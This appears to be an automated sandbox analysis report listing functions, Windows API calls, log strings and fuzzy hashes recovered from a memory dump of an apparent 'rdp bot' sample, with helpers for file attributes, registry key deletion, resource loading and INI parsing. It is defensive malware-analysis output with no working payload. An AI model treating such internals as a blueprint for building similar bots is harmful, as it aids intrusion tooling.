(xpath != NULL), xrefs: 00007FFE1338823D
[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FFE133881E5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13388218, 00007FFE1338824B, 00007FFE1338827B, 00007FFE133882AB
((*xpath_sz) > 0), xrefs: 00007FFE1338829D
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FFE133882DD
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FFE1338831E
(xpath_sz != NULL), xrefs: 00007FFE1338826D
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13388203, 00007FFE13388236, 00007FFE13388266, 00007FFE13388296
fs_path_expand, xrefs: 00007FFE133881DE, 00007FFE13388211, 00007FFE13388244, 00007FFE13388274, 00007FFE133882A4, 00007FFE133882D6, 00007FFE13388317, 00007FFE133883E4

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2819899730
Opcode ID: 8ab0d63a7ad09023c8dadfca32a360aa26305965fbad4a44faec58763f4efc0f
Instruction ID: cd99a7b5d0b9ba31bbcdd5da4256e0e30ceb1329cbb5b3f0091f4ea4939fea79
Opcode Fuzzy Hash: 8ab0d63a7ad09023c8dadfca32a360aa26305965fbad4a44faec58763f4efc0f
Instruction Fuzzy Hash: 1A615162A0CD07CDFA608B46F8403BC26526B60374F5542F6C52E6BAB5DF7DE986830D

Function 00007FFE13384E79 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FFE13384EA6
LoadResource.KERNEL32 ref: 00007FFE13384EBE

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

GetLastError.KERNEL32 ref: 00007FFE13384FB8
GetLastError.KERNEL32 ref: 00007FFE13384FED
GetLastError.KERNEL32 ref: 00007FFE13384FF2

Strings

(hnd != NULL), xrefs: 00007FFE13384F71
[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE13384FCD
C:/Projects/rdp/bot/codebase/module.c, xrefs: 00007FFE13384F6A, 00007FFE13384F95
(out != NULL), xrefs: 00007FFE13384F9C
[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE13385002
[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat, xrefs: 00007FFE13384F46
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13384F7F, 00007FFE13384FAA
module_get_version, xrefs: 00007FFE13384F3F, 00007FFE13384F78, 00007FFE13384FA3, 00007FFE13384FC6, 00007FFE13384FFB

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLast$Resource$FindLoadfflushfwrite
String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
API String ID: 2123903355-2019010457
Opcode ID: 1629f6cdff152c952fef223b62ae5ce28c209337de3446359f48edf2346dde2c
Instruction ID: 7d3f79fed07386381d261911b8f994fd0426892276d77c02fa5cdf0d692e2a62
Opcode Fuzzy Hash: 1629f6cdff152c952fef223b62ae5ce28c209337de3446359f48edf2346dde2c
Instruction Fuzzy Hash: 71413575A09A42CEE750DF26E44056977E1FB68764F400279DA6DB3BB4EB3CE844CB04

Function 00007FFE13387FE3 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1338800E
strlen.MSVCRT ref: 00007FFE13388037
strlen.MSVCRT ref: 00007FFE13388043
strlen.MSVCRT ref: 00007FFE13388059

Strings

(path != NULL), xrefs: 00007FFE13388093
NULL, xrefs: 00007FFE1338816D
fs_path_temp, xrefs: 00007FFE13388067, 00007FFE1338809A, 00007FFE133880CA, 00007FFE133880FA, 00007FFE13388134
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133880A1, 00007FFE133880D1, 00007FFE13388101
[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FFE1338813B
(path_sz != NULL), xrefs: 00007FFE133880C3
[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FFE1338806E
((*path_sz) > 0), xrefs: 00007FFE133880F3
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1338808C, 00007FFE133880BC, 00007FFE133880EC

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3302659514
Opcode ID: a340db96f21713e2e7cd9b7b340a61d268bd620e4dd1548086a42e5f2b03385c
Instruction ID: bef8141fce0361da9ae93dd2a1e304e603de394f3a9c35631046c5369dab77e5
Opcode Fuzzy Hash: a340db96f21713e2e7cd9b7b340a61d268bd620e4dd1548086a42e5f2b03385c
Instruction Fuzzy Hash: 0D4160A1D0CE479DFA119B13A8003BC1752AF647B4F4446F2C57E2BAB5DF7DA9868308

Function 00007FFE13381F01 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE13381FC6
GetProcessHeap.KERNEL32 ref: 00007FFE13381FD4
HeapAlloc.KERNEL32 ref: 00007FFE13381FE5
strlen.MSVCRT ref: 00007FFE13382003
GetProcessHeap.KERNEL32 ref: 00007FFE13382031
HeapFree.KERNEL32 ref: 00007FFE13382042

Strings

(buf != NULL), xrefs: 00007FFE13381F6D
(buf_sz != NULL), xrefs: 00007FFE13381F9D
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE13382057
ini_get_bytes, xrefs: 00007FFE13381F74, 00007FFE13381FA4
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE13381F66, 00007FFE13381F96
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13381F7B, 00007FFE13381FAB
mem_alloc, xrefs: 00007FFE13382050

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Heap$Processstrlen$AllocFree
String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
API String ID: 1318626975-3964590784
Opcode ID: cf1b99c35f276a5e0c651773de3d5a766dbe0ef933e7924d8d0a11dcf365ad75
Instruction ID: 7686a694d19eea8e207303f6ada474ae0e454110e99be823c876717345e120fc
Opcode Fuzzy Hash: cf1b99c35f276a5e0c651773de3d5a766dbe0ef933e7924d8d0a11dcf365ad75
Instruction Fuzzy Hash: F4318161E08E438DF6509B1394003AC6261AF60BA4F4443F1D96E67BB6DF3CE985C348

Function 00007FFE13385564 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE1338563E

Part of subcall function 00007FFE13385309: GetFileAttributesA.KERNEL32 ref: 00007FFE1338532A

SetFileAttributesA.KERNEL32 ref: 00007FFE133855AB

Strings

(path != NULL), xrefs: 00007FFE133855D0
(attr != NULL), xrefs: 00007FFE133855FB
NULL, xrefs: 00007FFE13385774
[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x), xrefs: 00007FFE13385724
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FFE1338578A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133855DE, 00007FFE13385609
[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FFE13385655
fs_attr_set, xrefs: 00007FFE133855D7, 00007FFE13385602, 00007FFE1338564E, 00007FFE1338571D, 00007FFE13385783
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE133855C9, 00007FFE133855F4

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: AttributesFile$ErrorLast
String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
API String ID: 365566950-3085771803
Opcode ID: 7514cd20b27e907929f1a418a85780667d7c45201f85419700cd80c35fa270af
Instruction ID: 71fd66c5e2e2ebe75902f2ea95c5e7fc59036c093a7a37a7457b16f9897b52bf
Opcode Fuzzy Hash: 7514cd20b27e907929f1a418a85780667d7c45201f85419700cd80c35fa270af
Instruction Fuzzy Hash: E9519361E0DE47CDFA209B12E44027D26519F303A4F5053F2E97EA6AF8DE2CE985C709

Function 00007FFE13389688 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyExA.ADVAPI32 ref: 00007FFE133896AB

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

NULL, xrefs: 00007FFE133898B8
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FFE133896C8
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE133896E6, 00007FFE13389716
registry_delete_key, xrefs: 00007FFE133896C1, 00007FFE133896F4, 00007FFE13389724, 00007FFE13389756, 00007FFE1338977D
[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE13389784
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133896FB, 00007FFE1338972B
u, xrefs: 00007FFE1338970E
(key != NULL), xrefs: 00007FFE1338971D
(root != NULL), xrefs: 00007FFE133896ED
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FFE1338975D

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: Deletefflushfwrite
String ID: (key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegDeleteKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_delete_key$u
API String ID: 2939363742-1701293196
Opcode ID: 71e359711ef35e69ae2a96206f6f5258ce76c1960beb5f0bfe9bab49c5c139ac
Instruction ID: b1ba2474057fe831945428304cdba6bfea706c84077b42ab44cb5f41c6529b64
Opcode Fuzzy Hash: 71e359711ef35e69ae2a96206f6f5258ce76c1960beb5f0bfe9bab49c5c139ac
Instruction Fuzzy Hash: 22415E52D0CD138DFA209A16A8403BD52516F64778F8A03F2EC7E77AB0DE1DADC59389

Function 00007FFE13384302 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 80COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 00007FFE13384325
GetLastError.KERNEL32 ref: 00007FFE1338436C

Strings

(mi != NULL), xrefs: 00007FFE1338434B
sys_mem_info, xrefs: 00007FFE13384352, 00007FFE13384377
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13384359
~, xrefs: 00007FFE133843EA
P, xrefs: 00007FFE133843EF
, xrefs: 00007FFE1338438A
C:/Projects/rdp/bot/codebase/sys.c, xrefs: 00007FFE13384344
[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu), xrefs: 00007FFE1338437E
;, xrefs: 00007FFE1338433C

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorGlobalLastMemoryStatus
String ID: $(mi != NULL)$;$C:/Projects/rdp/bot/codebase/sys.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GlobalMemoryStatusEx failed(gle=%lu)$sys_mem_info$~
API String ID: 3848946878-3004215591
Opcode ID: 85c3a2dd30ad7397df65ac58cc5cbe68b13c8f9c365175e3deb9b9c3fb48f759
Instruction ID: 4725bfdd5fe95d3e040d5f01e76fe82c8e381cad71a77b942eefae8869e39b48
Opcode Fuzzy Hash: 85c3a2dd30ad7397df65ac58cc5cbe68b13c8f9c365175e3deb9b9c3fb48f759
Instruction Fuzzy Hash: 03312F20E0DF43CAFB208756A48037C12509F78328FA443FAC52E36DB1AE9D69D6C309

Function 00007FFE1338418F Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 44synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FFE133841AF
CloseHandle.KERNEL32 ref: 00007FFE133841BC
WaitForSingleObject.KERNEL32 ref: 00007FFE133841D4
CloseHandle.KERNEL32 ref: 00007FFE133841E1
WaitForSingleObject.KERNEL32 ref: 00007FFE133841F9
CloseHandle.KERNEL32 ref: 00007FFE13384206
DeleteCriticalSection.KERNEL32 ref: 00007FFE13384218
DeleteCriticalSection.KERNEL32 ref: 00007FFE1338422A

Strings

Done, xrefs: 00007FFE13384272
server_cleanup, xrefs: 00007FFE13384279
[I] (%s) -> %s, xrefs: 00007FFE13384280

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: CloseHandleObjectSingleWait$CriticalDeleteSection
String ID: Done$[I] (%s) -> %s$server_cleanup
API String ID: 904620939-1981861988
Opcode ID: c82478e3e6ed024dc819f4f9e8d89e1b260c7a75ad157ef554709ace1bcf0102
Instruction ID: 9ca0097f3210207a4abdd4baa7b267ab091bd71f8ab1fd6adbfd7adc64469bf6
Opcode Fuzzy Hash: c82478e3e6ed024dc819f4f9e8d89e1b260c7a75ad157ef554709ace1bcf0102
Instruction Fuzzy Hash: CC218764908E06CDEA149B27FC543382262BFA5B74F9003F5D57E66AF0CF3CA4899348

Function 00007FFE13387323 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FFE13387369
GetFileSize.KERNEL32 ref: 00007FFE1338738C
CloseHandle.KERNEL32 ref: 00007FFE133873AE
GetLastError.KERNEL32 ref: 00007FFE13387434
GetLastError.KERNEL32 ref: 00007FFE133874FA

Strings

(path != NULL), xrefs: 00007FFE133873E3
(size != NULL), xrefs: 00007FFE13387413
fs_file_size, xrefs: 00007FFE133873EA, 00007FFE1338741A
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133873F1, 00007FFE13387421
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE133873DC, 00007FFE1338740C

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
API String ID: 3555958901-1687387729
Opcode ID: b3b36dbc8afbe191cb24fb57c58e9f50c49046a9dc923a32d3657b398a5ad375
Instruction ID: c09b63ad5f245e1315dd40a5a359a5c593c9f3719029ae65f28b6591bc918d8e
Opcode Fuzzy Hash: b3b36dbc8afbe191cb24fb57c58e9f50c49046a9dc923a32d3657b398a5ad375
Instruction Fuzzy Hash: 8A611B51D0CD128AFB228626A44437C51539F60374F2507F6C87EB7AF0DEADACE5538A

Function 00007FFE13387644 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FFE133876A3
GetFileTime.KERNEL32 ref: 00007FFE133876BE
GetLastError.KERNEL32 ref: 00007FFE133876CC
CloseHandle.KERNEL32 ref: 00007FFE133877EE

Strings

(path != NULL), xrefs: 00007FFE13387700
(ctime != NULL) || (atime != NULL) || (mtime != NULL), xrefs: 00007FFE13387733
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1338770E, 00007FFE13387741
fs_file_stat, xrefs: 00007FFE13387707, 00007FFE1338773A
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE133876F9, 00007FFE1338772C

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastTime
String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
API String ID: 2291555494-3647951244
Opcode ID: be5ba19aa747141ecec10db0bbfd4defc062e68ed8210f063c976043a40573cd
Instruction ID: 81049997388b2bae1af777c78325e21a992a13d35447383065534bdc9d75f319
Opcode Fuzzy Hash: be5ba19aa747141ecec10db0bbfd4defc062e68ed8210f063c976043a40573cd
Instruction Fuzzy Hash: 6B516162D0CA468EFA228B12950477D11526F207B4F1847F1E93E7BAF0DE6DACD5C349

Function 00007FFE13381A90 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 70COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE13381B2E
_errno.MSVCRT ref: 00007FFE13381B4C
_errno.MSVCRT ref: 00007FFE13381B54

Strings

ini_get_uint16, xrefs: 00007FFE13381B0D, 00007FFE13381B75
[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE13381B7C
(value != NULL), xrefs: 00007FFE13381B06
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE13381AFF
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13381B14

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: _errno
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 2918714741-1991603811
Opcode ID: 1535ae5d27a888cf2ff86a259e1bf70aef749437b50ce9cff9f424e1d448de43
Instruction ID: 82707c8be9b315185cfeea337dbebac740511943a59ee85c7eda31a8704b235a
Opcode Fuzzy Hash: 1535ae5d27a888cf2ff86a259e1bf70aef749437b50ce9cff9f424e1d448de43
Instruction Fuzzy Hash: 7C21D622A08E4389E7519B16E8407AE7361BB647E4F4401B1DE5D57B74DF3DE885C708

Function 00007FFE13381C10 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE13381CAA
_errno.MSVCRT ref: 00007FFE13381CC8
_errno.MSVCRT ref: 00007FFE13381CD4

Strings

(value != NULL), xrefs: 00007FFE13381C82
[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE13381CFB
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE13381C7B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13381C90
ini_get_uint32, xrefs: 00007FFE13381C89, 00007FFE13381CF4

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: _errno
